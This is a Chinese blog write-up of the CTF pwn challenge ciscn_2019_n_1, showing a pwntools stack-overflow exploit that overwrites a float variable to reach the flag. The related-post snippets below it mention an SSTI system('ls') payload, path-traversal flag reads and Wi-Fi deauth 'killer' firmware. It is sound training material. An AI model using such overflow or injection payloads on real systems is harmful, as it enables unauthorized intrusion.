[BUUCTF-PWN] ciscn_2019_n_1

最新推荐文章于 2024-04-14 00:09:22 发布
最新推荐文章于 2024-04-14 00:09:22 发布
阅读量256 收藏
点赞数
分类专栏: BUUCTF-PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46098032/article/details/122312198
版权

下载文件,checksec看一下。

用IDA64打开文件,找到main函数,F5查看。

双击进去func函数。

输入的数传给v1,但是需要使v2=11.28125才能获得flag。我们查看一下v1和v2的栈信息。

因此我们可以利用gets先覆盖到v2的部分,再跟上11.28125的十六进制数即可成功获取flag。

11.28125的16进制为0x41348000。

exp如下:

from pwn import *

p = remote('node4.buuoj.cn', 27823)
payload = b'a'*(0x30-0x04) + p32(0x41348000)

p.sendline(payload)
p.interactive()

得到flag

 flag{5634a138-9e1b-47e3-8fa4-0a778a1c29d3}

迷迷糊糊看世界
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.csdn.net/A951860555/article/details/111991072
buuctf前四题详解
2301_79970561的博客
02-01 397
/sendline() 和 send() 唯一的区别就是在发送的字符串后面加上了回车换行符.sh.interactive() //发送命令进行交互, sh.interactive()允许我们在终端里将命令传送到靶机服务器。和上题一样,我们点击/bin/sh,点击command,再点击x,发现在fun函数中。#sh = process('./pwn1') //本地调试。点击/bin/sh,点击command,再点击x发现在main函数中。
【CTF】ciscn_2019_n_1和pwn1_sctf_2016--栈溢出
最新发布
qq_48201589的博客
04-14 268
BUUICTF的ciscn_2019_n_1和pwn1_sctf_2016--栈溢出类型解题思路
C语言 利用setvbuf来设置缓冲区的模式
TomCat的播客
06-30 828
setvbuf主要用于优化内存提高系统效率。 int setvbuf(FILE *stream, char *buffer, int mode, size_t size) stream – 这是指向 FILE 对象的指针,该 FILE 对象标识了一个打开的流。 buffer – 这是分配给用户的缓冲。如果设置为 NULL,该函数会自动分配一个指定大小的缓冲。 mode – 这指定了文件缓冲的模...
Pwn】什么是堆栈内存对齐
weixin_52553215的博客
03-05 1039
AND ESP 0XFFFFFFF0 主流编译器的编译规则规定 “ 程序访问的地址必须向16字节对齐(被16整除)” ,内存对齐之后可以提高访问效率。 对齐前:三次 对齐后:两次
CISCN 2019华北 PWN1
2301_79793667的博客
12-11 170
将浮点数11.28125转化为十六进制数41348000,通过输入v1的值将41348000溢出给v2,因为float类型数值长度是4,所以需要用p32()进行打包。让我们猜数,但是随便输入一个数之后程序会退出,那我们检查一下附件。如果v2==11.28125,那么就会执行cat/flag。然后在虚拟机里nc连接一下,显示如下。首先打开环境,下载附件。
BUUCTF Pwn ciscn_2019_n_1 1
qq_45200829的博客
11-08 324
BUUCTF Pwn类型 ciscn_2019_n_1 1 解题过程
BUUCTFpwn题解(一些栈题+程序分析)
热门推荐
swedsn
01-13 1万+
文章目录前言一、test_your_nc二、rip2.读入数据总结 前言 萌新的总结(包含当时做题的全过程),方便以后查看。有什么不对的望各位大佬指点。 一、test_your_nc 1.直接nc(nc+的ip+端口号)。这里是直接进入了对方的shell命令中(有些题目是直接进入对方的文件并不会进入对方的shell中)。接下来就是和操作自己的shell一样的,ls查看目录,cat查看文件flag。 相互连接 二、rip 1使用IDA打开文件,先找main函数,然后按F5查看伪代码。看wp说fun可疑,点进
ciscn_2019_n_1 ——两种解法
qq_41696518的博客
07-13 2524
ciscn_2019_n_1 两种解法
web buuctf [CISCN2019 华东南赛区]Web11
weixin_44214568的博客
04-07 446
知识点:1.SSTI(smarty模板) 2.XFF 1.开题: a.题目标明smarty,这是用php编写的比较著名的模板引擎,猜测很可能和模板注入有关系 b.提示xff 2.利用bp抓包,添加xff并尝试模板注入 很明显存在SSTI 3.改payload={system('ls')} 分别cat没有flag 猜测可能在目录下面 'cat ../../../flag'(前面有几个../需要挨个试一下) flag{3941b25d-8279-47eb-...
2021_09_15_ciscn_2019_n_1
m0_51187558的博客
09-15 2723
ciscn_2019_n_1 前言 每日一题pwn方向的第二题。也是初入漏洞利用的一道特别基础的题。 大家都应该尝试着做过了上一道,也就是test your nc。从解法来说其实那道题的难度真的只是半脚踩在入门的门坎上。就像wp中所说的那样,目前pwn题的核心是通过漏洞挖掘与利用来提权,而nc这道题可以说是不需要任何漏洞的挖掘与利用,做出这道题并不代表你已经入门pwn了。 虽然如此,从ciscn_2019_n_1这道题开始,我们真正要开始尝试迈过pwn题的那一道门槛,面对一些简单的漏洞进行利用了。 做题流程
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
buuctf-pwn刷题(二)
CHAWUCIREN1的博客
10-15 2053
ciscn_2019_n_1 直接运行一波 猜数字的 checksec file一下 放入ida 发现func函数里面有 东西 这个是一道溢出题,我们输入的数字给v1,但是在进行判断的时候,用的是v2,我们需要溢出v2,使其等于目标值 查看一下栈空间 我们发现v2在栈上04的位置,也就是(0x30-4) 11.28125转化为十六进制为0x41348000 pay load= b’A’*(0x30-4) + p64(0x41348000) from pwn import * payload =
pwn——ciscn_2019_n_1#pwn1_sctf_2016#jarvisoj_level0
LSYZWF的博客
10-26 556
文章目录ciscn_2019_n_1题目解答 ciscn_2019_n_1 题目 题目链接:https://buuoj.cn/challenges#ciscn_2019_n_1 解答 1、打开IDA进行分析 发现函数gets和系统命令cat 此函数的大致意思是输入v1的值,然后判断v2,故存在栈溢出使得v2的内存中的值为11.28125 2、判断偏移地址 v2的内存地址距离v1首地址的偏移量是30h-04h=2ch 3、gdb调试一波 没有堆栈溢出保护 4、编写脚本 11.28125十六进制可以在I
nssctf [CISCN 2019华北]PWN1
n1ght的博客
03-08 660
通过v1的值覆盖到v2的地址,将小数转成十六机制,发送使v2的值就等于11.2815。还有个思路就是我们覆盖返回地址为system("cat /flag")的地址。我们可以输入v1的值,当v2的值是11.28125的时候,查看文件内容。所以v1离v2的距离是0x30-0x4,并且11.2815的十六进制是。发现func函数,点进去查看函数具体代码。发现开启了栈不可执行和部分地址随机化。checksec查看保护机制。v1离rbp的距离是0x30。看到了逻辑,v2的值0.0。v2离rbp的距离是0x4。
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值